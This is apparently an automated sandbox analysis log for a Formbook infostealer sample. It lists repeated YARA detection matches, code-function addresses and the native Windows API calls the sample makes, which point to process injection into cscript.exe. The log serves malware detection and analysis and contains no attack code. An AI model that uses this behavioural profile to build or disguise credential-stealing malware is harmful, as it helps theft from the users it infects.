          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: CtTYTpaAKA.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.4.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.8.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.CtTYTpaAKA.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.6.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.6.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.CtTYTpaAKA.exe.400000.8.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CtTYTpaAKA.exe.3b15be0.3.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.CtTYTpaAKA.exe.3acb9c0.2.raw.unpack, type: UNPACKEDPE; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.325485769.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.353978087.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.354912343.00000000012B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000000.341621895.000000000FAD4000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557056820.0000000000150000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.296512785.00000000039A9000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.293661592.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557804622.00000000007B0000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.293144075.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.557379114.00000000005B0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.354450350.0000000000F40000.00000040.00020000.sdmp, type: MEMORY; Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 2_2_0284E6A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 2_2_0284E690
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 2_2_0284E69B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 2_2_0284CC5C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 2_2_00612050
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0040102D
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041B8D3
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041B8D6
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041C98B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0041C343
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00408C8B
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00408C90
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01072D07
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01071D55
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD20A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FBB090
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_010725DD
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FB841F
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01061002
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FBD5E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FD2581
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_010720A8
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FA0D20
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FC4120
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FAF900
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01072B28
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FC6E30
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_0106DBD2
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01071FF1
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00FDEBB0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_010722AE
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_01072EF7
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exe Code function: 5_2_00542050
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_047FD466
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_048020A8
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0474841F
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_048028EC
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_047F1002
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_047620A0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0474B090
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04730D20
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04754120
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_048025DD
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0473F900
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04802D07
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0474D5E0
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04801D55
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04762581
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_048022AE
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04756E30
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04802EF7
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04801FF1
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_04802B28
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_047FDBD2
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 10_2_0476EBB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B8D610_2_0016B8D6
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016B8D310_2_0016B8D3
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016C98B10_2_0016C98B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_0016C34310_2_0016C343
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00158C9010_2_00158C90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00158C8B10_2_00158C8B
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152D9010_2_00152D90
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152D8C10_2_00152D8C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_00152FB010_2_00152FB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: String function: 0473B150 appears 35 times
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: String function: 00FAB150 appears 35 times
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004185F0 NtCreateFile,5_2_004185F0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004186A0 NtReadFile,5_2_004186A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00418720 NtClose,5_2_00418720
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004187D0 NtAllocateVirtualMemory,5_2_004187D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004185EB NtCreateFile,5_2_004185EB
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_0041871A NtClose,5_2_0041871A
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_004187CA NtAllocateVirtualMemory,5_2_004187CA
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE98F0 NtReadVirtualMemory,LdrInitializeThunk,5_2_00FE98F0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9860 NtQuerySystemInformation,LdrInitializeThunk,5_2_00FE9860
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9840 NtDelayExecution,LdrInitializeThunk,5_2_00FE9840
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE95D0 NtClose,LdrInitializeThunk,5_2_00FE95D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE99A0 NtCreateSection,LdrInitializeThunk,5_2_00FE99A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9540 NtReadFile,LdrInitializeThunk,5_2_00FE9540
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9910 NtAdjustPrivilegesToken,LdrInitializeThunk,5_2_00FE9910
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE96E0 NtFreeVirtualMemory,LdrInitializeThunk,5_2_00FE96E0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9660 NtAllocateVirtualMemory,LdrInitializeThunk,5_2_00FE9660
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A50 NtCreateFile,LdrInitializeThunk,5_2_00FE9A50
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A20 NtResumeThread,LdrInitializeThunk,5_2_00FE9A20
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A00 NtProtectVirtualMemory,LdrInitializeThunk,5_2_00FE9A00
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9FE0 NtCreateMutant,LdrInitializeThunk,5_2_00FE9FE0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE97A0 NtUnmapViewOfSection,LdrInitializeThunk,5_2_00FE97A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9780 NtMapViewOfSection,LdrInitializeThunk,5_2_00FE9780
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9710 NtQueryInformationToken,LdrInitializeThunk,5_2_00FE9710
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE98A0 NtWriteVirtualMemory,5_2_00FE98A0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEB040 NtSuspendThread,5_2_00FEB040
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9820 NtEnumerateKey,5_2_00FE9820
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE95F0 NtQueryInformationFile,5_2_00FE95F0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE99D0 NtCreateProcessEx,5_2_00FE99D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9560 NtWriteFile,5_2_00FE9560
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9950 NtQueueApcThread,5_2_00FE9950
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEAD30 NtSetContextThread,5_2_00FEAD30
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9520 NtWaitForSingleObject,5_2_00FE9520
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE96D0 NtCreateKey,5_2_00FE96D0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A80 NtOpenDirectoryObject,5_2_00FE9A80
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9670 NtQueryInformationProcess,5_2_00FE9670
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9650 NtQueryValueKey,5_2_00FE9650
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9610 NtEnumerateValueKey,5_2_00FE9610
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9A10 NtQuerySection,5_2_00FE9A10
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA3B0 NtGetContextThread,5_2_00FEA3B0
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9770 NtSetInformationFile,5_2_00FE9770
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA770 NtOpenThread,5_2_00FEA770
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9760 NtOpenProcess,5_2_00FE9760
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9730 NtQueryVirtualMemory,5_2_00FE9730
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FEA710 NtOpenProcessToken,5_2_00FEA710
          Source: C:\Users\user\Desktop\CtTYTpaAKA.exeCode function: 5_2_00FE9B00 NtSetValueKey,5_2_00FE9B00
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779860 NtQuerySystemInformation,LdrInitializeThunk,10_2_04779860
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779840 NtDelayExecution,LdrInitializeThunk,10_2_04779840
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779540 NtReadFile,LdrInitializeThunk,10_2_04779540
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_04779910
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047795D0 NtClose,LdrInitializeThunk,10_2_047795D0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_047799A0 NtCreateSection,LdrInitializeThunk,10_2_047799A0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 10_2_04779660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_04779660
